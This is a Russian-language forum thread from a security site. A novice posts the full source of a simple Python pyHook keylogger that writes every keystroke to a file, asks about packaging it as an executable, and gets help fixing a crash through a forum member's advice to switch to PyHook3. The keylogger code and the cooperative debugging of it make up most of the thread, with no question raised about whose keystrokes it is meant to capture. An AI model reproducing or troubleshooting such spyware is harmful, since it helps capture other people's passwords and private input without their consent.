• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

GopnikToday

Member
20.10.2019
18
0
BIT
0
К сожалению у меня возникла некоторая проблема с Кейлоггером. Нашел я его на этом же форуме.
Вот код, чтобы вы его не искали:
import pyHook, pythoncom, logging

def on_keyboard_event(event):
with open('keyloggerlog.txt', 'a') as fp:
fp.write(event.Key + ' ')
return True

hook_manager = pyHook.HookManager()
hook_manager.KeyDown = on_keyboard_event
hook_manager.HookKeyboard()
pythoncom.PumpMessages()
Когда я его запускаю выводится такая ошибка - TypeError: KeyboardSwitch() missing 8 required positional arguments: 'msg', 'vk_code', 'scan_code', 'ascii', 'flags', 'time', 'hwnd', and 'win_name'
Буду очень рад если кто-нибудь поможет в этом разобраться.
P.S Если кто-то знает, посоветуйте, компилировать его надо будет с помощью cx_freeze или с помощью pyinstaller?
Заранее спасибо гайсы.
 

GopnikToday

Member
20.10.2019
18
0
BIT
0
а гуглить не пробывал) ?
Не мог бы ты обьяснить чайнику поточнее кое-какой момент? Я чекнул способ решения, но них** не понял. Чекал я его на этом сайте -
 

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
959
Когда я его запускаю выводится такая ошибка
Покажи как запускаешь. У меня после установки нужных пакетов всё работает.
Code_K7SWgPMipG.png
 

GopnikToday

Member
20.10.2019
18
0
BIT
0
Покажи как запускаешь. У меня после установки нужных пакетов всё работает.
Посмотреть вложение 34241
Работает всё так -
scrin_1.png







Затем всё идет так, если я перехожу куда-нибудь в другую программу, вкладку и т.п, тоесть выскакивает уже ранее описанная проблема. -




scrin_2.png
 

GopnikToday

Member
20.10.2019
18
0
BIT
0
Покажи как запускаешь. У меня после установки нужных пакетов всё работает.
Посмотреть вложение 34241
По-идее после перехода в другую программу, приложение ( например: хром, опера ) такого же не должно быть? А насчёт пакетов - то они все установлены.
 

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
959
Работает всё так
Да, на самом деле проблема такая есть.
The problem occurs only with windows with non-ascii characters in their title
Проблема проявляется только с окнами в заголовке которых есть non-ascii символы



So I think the problem here is that, even if GetWindowText is not returning wide characters, it can return non-ascii characters from an ANSI codepage. That won't fail, however, until we do this:

// pass the message on to the Python function
Код:
arglist = Py_BuildValue("(iiiiiiiz)", wParam, kbd->vkCode, kbd->scanCode, ascii,
                        kbd->flags, kbd->time, hwnd, win_name);

So I'm not completely sure on the best fix here. But I just changed both bits of code to use wide characters and unicode instead of ascii, and rebuilt pyHook, and that seemed to fix it. I think it will only work in Python 3 versions

И ещё небольшой совет: в папке проекта лучше не использовать кириллицу.
 

GopnikToday

Member
20.10.2019
18
0
BIT
0
Да, на самом деле проблема такая есть.




И ещё небольшой совет: в папке проекта лучше не использовать кириллицу.
Тоесть, нужно переустановить эти пакеты, нужные для кейлогера? Верно? Я всё правильно понял?
 

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
959
Тоесть, нужно переустановить эти пакеты, нужные для кейлогера? Верно? Я всё правильно понял?
Нет, дело не в переустановке.
Нужно скачать исходники пакета, разахивировать их, внести изменения,
потом собрать заново и потом установить изменённый пакет.
Непросто, согласен, но вот такой просчёт случился у автора...
 

GopnikToday

Member
20.10.2019
18
0
BIT
0
Нет, дело не в переустановке.
Нужно скачать исходники пакета, разахивировать их, внести изменения,
потом собрать заново и потом установить изменённый пакет.
Непросто, согласен, но вот такой просчёт случился у автора...
Угу, а что ты подразумеваешь под словом "исходники пакета"? Просто к сожалению, я чайник в программировании и не особо разбираюсь в нём ( P.S Увлекаюсь я этим наверно только последние 2 недели, тоесть мои знания в этой области крайне скромны и я понимаю всё только на пальцах :( )
 

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
959
Угу, а что ты подразумеваешь под словом "исходники пакета"? Просто к сожалению, я чайник в программировании и не особо разбираюсь в нём ( P.S Увлекаюсь я этим наверно только последние 2 недели, тоесть мои знания в этой области крайне скромны и я понимаю всё только на пальцах :( )
Любой внешний модуль, который ты используешь в своём проекте, был кем-то написан
Иногда на Python'e, иногда на другом языке программирования.
И эти модули, точно так же, как и любой другой код, можно редактировать и изменять.

Рекомендуют использовать форк этого проекта

pip install PyHook3
 

GopnikToday

Member
20.10.2019
18
0
BIT
0
Да, вполне возможно, что в этом форке эту проблему "починили".
Надо пробовать.
Теперь вроде начинаю понимать, итог: Мне нужно установить PyHook3, затем мне надо
"разахивировать их, внести изменения,
потом собрать заново и потом установить изменённый пакет.", и уже после этого запускать программу?
 

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
959
Теперь вроде начинаю понимать, итог: Мне нужно установить PyHook3, затем мне надо
"разахивировать их, внести изменения,
потом собрать заново и потом установить изменённый пакет.", и уже после этого запускать программу?
Нет, тебе просто надо установить PyHook3.
Команду для установки я тебе написал.
Открываешь cmd.exe и там пишешь
python -m pip install PyHook3
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!